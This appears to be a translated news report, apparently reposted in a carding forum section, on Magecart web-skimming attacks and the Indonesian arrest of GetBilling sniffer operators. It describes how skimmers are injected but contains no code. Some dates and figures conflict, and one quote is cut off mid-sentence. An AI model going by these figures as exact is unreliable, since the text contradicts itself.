Magecart web skimming groups have infected hundreds of thousands of sites

[Carding]

Attacks, in which cybercriminals compromise online store sites in order to steal users' bank card details, continue to gain traction. These malicious campaigns have a common name - Magecart, under which numerous groups operate.

These cybercriminals use a technique known as web skimming - a special JavaScript code is placed on the attacked site, copying the user's card data and sending it to the attacker's server.

Injection of malicious code can be achieved in two ways: by hacking the resource directly or by downloading the code through third-party elements (for example, an analytics script or a customer support widget).

Researchers at RiskIQ argue that the first threat in the form of Magecart activities arose on August 8, 2010. Since then, many cyber groups have created skimming scripts in an attempt to infect thousands of sites.

RiskIQ estimates that millions of users have become victims of Magecart - the data collected by analysts showed 2,086,529 cases of Magecart activity being detected. The company believes that attacks on supply chains are the main reason for the surge in Magecart activity.

Of all the Magecart class groups, experts single out Group 5 - it is the most "advanced" and successful. The members of this group specialize in third-party providers: SociaPlus and Inbenta, which provide analytics. Group 5 in the course of its activities managed to intercept the payment data of hundreds of sites.

Unsecured and misconfigured Amazon S3 buckets are also targeted by these cybercriminals, as they typically store resources used by multiple domains.

Since the beginning of April this year, RiskIQ has been monitoring the compromise of S3 buckets, collecting disappointing statistics: attackers have injected scripts on more than 18 thousand hosts.

 

[Jollier]

Indonesia arrested three carders practicing MageCart attacks

The Indonesian cyber police, together with Interpol and Group-IB, announced the arrest of members of a criminal group who infected hundreds of online stores with JavaScript sniffers in Australia, Brazil, Great Britain, Germany, Indonesia, the United States and other countries of the world. Among the victims are Russian and Ukrainian users.

Let me remind you that initially the name MageCart was assigned to one hack group, which was the first to install web skimmers on the websites of online stores to steal bank card data. But this approach was so successful that the group soon had numerous imitators, and the name MageCart became a household name, and now they denote a whole class of such attacks. And if in 2020 RiskIQ researchers identified 12 such groups, then at the end of 2020, according to IBM, there were already about 38 of them.

Law enforcement officials and Group-IB report that criminals stole bank card details from customers and used them to buy gadgets and luxury goods. The liquidation of this criminal group was the first successful operation against Magecart operators in the Asia-Pacific region (APAC).

The joint operation "Night Fury" of the Indonesian Cyber Police, INTERPOL's ASEAN Cyber Capability Desk (ASEAN Desk) and the Group-IB Investigation Department at APAC was carried out in December 2019. As a result, three Indonesian residents aged 23 to 35 were arrested. All of them are charged with stealing electronic data using the GetBilling family of sniffers. Operations in five more regions are still ongoing.

For the first time, Group-IB specialists described this family of sniffers in the Crime Without Punishment report in April 2021, and have been tracking the GetBilling JS-sniffer family since 2018. An analysis of the infrastructure controlled by the GetBilling operators arrested in Indonesia showed that they managed to infect almost 200 websites in Indonesia, Australia, Europe, the United States, South America and several other countries. According to preliminary estimates, in a week, cybercriminals collected about a thousand unique cards and passwords from accounts from infected sites.

Even last year, experts managed to establish that part of the GetBilling infrastructure was deployed in Indonesia. Interpol promptly notified the Indonesian cyber police. Despite the fact that the GetBilling sniffer operators tried to hide their location (for example, criminals always used VPN to connect to the server to collect stolen data and control the sniffer, and only stolen cards were used to pay for hosting services and buy new domains), Group- IB worked with local police to gather evidence that the group was operating out of Indonesia and then track the suspects themselves.

An example of a malicious script GetBilling

An example of a record of stolen theft of payment and personal data stored on GetBilling servers.

It is reported that during the search, the police seized laptops, mobile phones of various manufacturers, processors, identification cards and bank cards from the detainees. According to the investigation, the stolen payment information was used by the suspects to buy gadgets and luxury goods, which they then resold on Indonesian sites below market value. The suspects have already been charged with theft of electronic data, a crime punishable by up to ten years in prison under the Indonesian criminal code. The investigation is ongoing.

It is worth noting that Sanguine Security experts write that this group included more members who are still at large. The group has been active since 2017, according to the company, and its malicious code has been found on 571 sites, 17 of which are still infected because the store owners failed to clean their sites properly.

Also Sanguine Security says that grouping code was easy to track because of the presence of a repetitive message "Success gan", which is translated from the Indonesian roughly as "success, bro".

“This case clearly demonstrates the international scope of cybercrime: JS sniffer operators lived in Indonesia, but attacked e-commerce resources around the world, which made it difficult to collect evidence, find victims and prosecute. However, international cooperation and data exchange can help effectively counter current cyber threats. Thanks to the prompt action of the Indonesian cyber police and Interpol, "Night Fury" became the first successful international operation against JavaScript sniffer operators in the APAC region. This is an excellent example of a coordinated cross-border cybercrime fight, and we are proud that the result of our Threat Intelligence, understanding of criminal schemes and their investigation, as well as forensic research of the data by Group-IB specialists helped to identify suspects. We hope,

“Operation Night Fury proved that all obstacles can only be overcome through close cooperation between law enforcement agencies, international organizations and private companies. Coordination of efforts between the Indonesian cyber police, Interpol and Group-IB has made it possible to attribute crimes, identify criminals who used sniffers, and arrest them. More importantly, it has helped protect innocent people and raise public awareness of cybercrime and its consequences, ”said Idam Wasiyadin, Police Superintendent of Indonesia.